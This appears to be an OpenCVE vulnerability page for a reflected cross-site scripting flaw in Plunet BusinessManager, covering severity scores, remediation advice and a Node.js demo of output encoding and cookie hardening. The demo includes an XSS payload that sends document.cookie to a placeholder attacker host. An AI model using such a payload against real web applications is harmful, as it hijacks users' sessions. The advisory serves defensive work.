Description
A vulnerability in Plunet BusinessManager allows session hijacking, data theft, and unauthorized actions on behalf of the user. This issue affects Plunet BusinessManager: 10.15.1.
Published: 2026-02-11
Score: 8.7 High
EPSS: < 1% Very Low
KEV: No
Impact: Cross‑Site Scripting leading to session hijacking and data theft
Action: Patch
AI Analysis

Impact

A cross‑site scripting flaw exists in Plunet BusinessManager, allowing attackers to inject malicious scripts into the web interface. The vulnerability can result in theft of session cookies, sensitive data, and execution of unauthorized actions on behalf of the user. This is an input validation failure (CWE‑79).

Affected Systems

Plunet BusinessManager, distributed by Plunet, is affected. The CVE record lists version 10.15.1 as affected; according to the vendor, version 10.22.3 and later contain the fix and are no longer vulnerable.

Risk and Exploitability

The CVSS 4.0 base score of 8.7 (vector AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:L/SC:L/SI:L/SA:N) classifies the issue as high severity: the flaw is reachable over the network, has low attack complexity, requires no privileges, and needs only passive user interaction, such as a victim opening a crafted link to the vulnerable application. The EPSS score is under 1 %, indicating a very low current exploitation probability, and the issue is not listed in CISA's KEV catalog; the SSVC assessment records no known exploitation but rates the issue as automatable. The attack requires the attacker to deliver a payload through user-supplied input that the application reflects into the page without encoding. If a victim follows the crafted link, the attacker's script runs in the victim's authenticated session and can hijack it or perform actions with the victim's authority. While no public exploit is documented, the high severity and the ease of automated, untargeted delivery of such links warrant swift remediation.

Generated by OpenCVE AI on April 17, 2026 at 20:21 UTC.

Remediation

Vendor Solution

Upgrade Plunet BusinessManager to version 10.22.3 or later, which includes a fix for the identified cross-site scripting vulnerabilities.


OpenCVE Recommended Actions

  • Upgrade Plunet BusinessManager to version 10.22.3 or later. This is the only complete fix: the missing output encoding is in vendor code and cannot be corrected by the operator.
  • Until the upgrade is deployed, reduce exposure at the edge: restrict access to the BusinessManager web interface to trusted networks or a VPN where possible, and deploy a web application firewall with XSS rules in front of it. A WAF matches known payload patterns and can be bypassed, so treat it as a stopgap, not a fix.
  • Limit the impact of any script that does execute: serve a Content‑Security‑Policy that forbids inline script (set at a reverse proxy if the application does not set one itself), and confirm that the session cookie carries the HttpOnly, Secure and SameSite attributes so it cannot be read by script or sent cross‑site. Do not rely on the X‑XSS‑Protection header; the browser XSS auditors it controlled have been removed from current browsers and it offers no protection.
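As an added illustration of the defect class behind this CVE and of the mitigations listed above (example code written for this page, not Plunet's code), the following Node.js snippet shows a search page that reflects a query value verbatim beside its output-encoded form, the response headers that bound the damage if an encoding gap is ever missed, and a small audit check for Set-Cookie headers. The search endpoint shape, the query value and the SESSIONID cookie name are assumptions for illustration; the exfiltration host is a placeholder.

```javascript
// Added example for this page, not Plunet's code. Demonstrates the CWE-79 pattern
// behind a reflected XSS and the two mitigations the recommendations describe:
// contextual output encoding (the real fix) and response headers that limit what an
// injected script can do (defence in depth). The search page, the query value and
// the SESSIONID cookie name are assumptions for illustration.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// Encode an untrusted value for an HTML text or double-quoted attribute context.
// Neutralising these five characters is what stops the value from changing the
// markup structure; this is encoding on output, not filtering on input.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the query value is reflected into the page verbatim, so markup
// inside it becomes part of the document (CWE-79).
function renderSearchVulnerable(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Hardened: same page, untrusted value encoded for the HTML context it lands in.
function renderSearchHardened(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Headers that bound the damage if an encoding gap is ever missed:
//  - a CSP without 'unsafe-inline' blocks inline <script> blocks and on* event
//    handlers (the per-response nonce permits only the application's own scripts);
//  - HttpOnly keeps the session cookie out of document.cookie, Secure keeps it
//    off plaintext HTTP, SameSite=Lax stops most cross-site sends.
function hardenedHeaders(sessionId, nonce) {
  return {
    "Content-Security-Policy":
      `default-src 'self'; script-src 'self' 'nonce-${nonce}'; object-src 'none'; base-uri 'none'`,
    "Set-Cookie": `SESSIONID=${sessionId}; Path=/; Secure; HttpOnly; SameSite=Lax`,
    "X-Content-Type-Options": "nosniff",
  };
}

// Audit check a defender can run against a captured Set-Cookie header: returns the
// protective attributes that are missing (an empty array means the cookie is hardened).
function auditSetCookie(setCookieHeader) {
  const present = setCookieHeader
    .split(";")
    .slice(1) // drop the name=value pair itself
    .map((attr) => attr.trim().split("=")[0].toLowerCase());
  return ["Secure", "HttpOnly", "SameSite"].filter(
    (want) => !present.includes(want.toLowerCase())
  );
}

// Constructed payload of the kind the analysis describes: exfiltrate the cookie
// to an attacker host (attacker.example is a placeholder, not a real indicator).
const SESSION_THEFT_PAYLOAD =
  "<img src=x onerror=\"fetch('https://attacker.example/c?'+document.cookie)\">";

console.log("vulnerable :", renderSearchVulnerable(SESSION_THEFT_PAYLOAD));
console.log("hardened   :", renderSearchHardened(SESSION_THEFT_PAYLOAD));
console.log("missing on weak cookie:", auditSetCookie("SESSIONID=abc123; Path=/"));
console.log("missing on hardened   :",
  auditSetCookie(hardenedHeaders("abc123", "r4nd0m")["Set-Cookie"]));
```

Run with `node xss_demo.js`. The hardened render shows the payload as literal text (`&lt;img src=x ...`) rather than as markup. Note that escapeHtml is correct only for HTML text and quoted attribute contexts; a value placed into a JavaScript string, a URL or a CSS value needs the encoder for that context, which is why encoding belongs at the output sink rather than in a generic input filter.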

Advisories

No advisories yet.

History

Wed, 11 Feb 2026 22:15:00 +0000

Type                 Values Removed   Values Added
First Time appeared                   Plunet
                                      Plunet business Manager
Vendors & Products                    Plunet
                                      Plunet business Manager

Wed, 11 Feb 2026 15:15:00 +0000

Type      Values Removed   Values Added
Metrics                    ssvc
                           {'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Wed, 11 Feb 2026 14:00:00 +0000

Type          Values Removed   Values Added
Description                    A vulnerability in Plunet BusinessManager allows session hijacking, data theft, unauthorized actions on behalf of the user. This issue affects Plunet BusinessManager: 10.15.1.
Title                          Reflected XSS on Plunet BusinessManager
Weaknesses                     CWE-79
References
Metrics                        cvssV4_0
                               {'score': 8.7, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:L/SC:L/SI:L/SA:N'}


MITRE

Status: PUBLISHED

Assigner: TCS-CERT

Published:

Updated: 2026-02-19T08:59:12.567Z

Reserved: 2026-02-11T10:58:48.725Z

Link: CVE-2026-2337

Vulnrichment

Updated: 2026-02-11T14:19:25.479Z

NVD

Status : Deferred

Published: 2026-02-11T14:16:02.390

Modified: 2026-04-15T00:35:42.020

Link: CVE-2026-2337

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-17T20:30:15Z

Weaknesses